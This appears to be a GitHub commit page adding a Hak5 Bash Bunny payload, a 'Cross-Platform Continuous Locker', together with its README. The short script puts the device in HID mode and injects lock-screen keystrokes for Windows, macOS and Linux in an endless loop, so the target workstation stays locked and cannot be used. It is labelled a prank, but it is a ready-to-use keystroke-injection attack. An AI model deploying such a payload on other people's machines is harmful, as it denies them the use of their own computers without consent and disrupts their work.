Added the cross platform continuous locker payload

pull/361/head
Darren Kitchen 2019-01-01 14:36:44 -08:00 committed by GitHub
parent ee48a74dc6
commit e61d58d488
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,6 @@
# Cross-Platform Continuous Locker
# Hak5Darren
#
LED M FAST
ATTACKMODE HID
while true; do QUACK GUI l; sleep 0.5; QUACK CTRL-ALT l; sleep 0.5; QUACK COMMAND-CTRL q; sleep 0.5; done

View File

@ -0,0 +1,21 @@
# Cross Platform Lock-out
* Author: Hak5Darren
* Version: Version 1.0
* Target: Windows 95+, OSX, Linux (most WMs)
* Category: Prank
* Attackmodes: HID
## Description
Continuously locks the workstation every second by injecting the lock screen keyboard shortcut for each major OS.
* Windows: WIN+l
* OSX: Command+Control+q
* Linux: WIN+l or CTRL+ALT+l
## STATUS
| LED | Status |
| ------------------- | -------------------------------------- |
| Magenta (blinking) | Running. |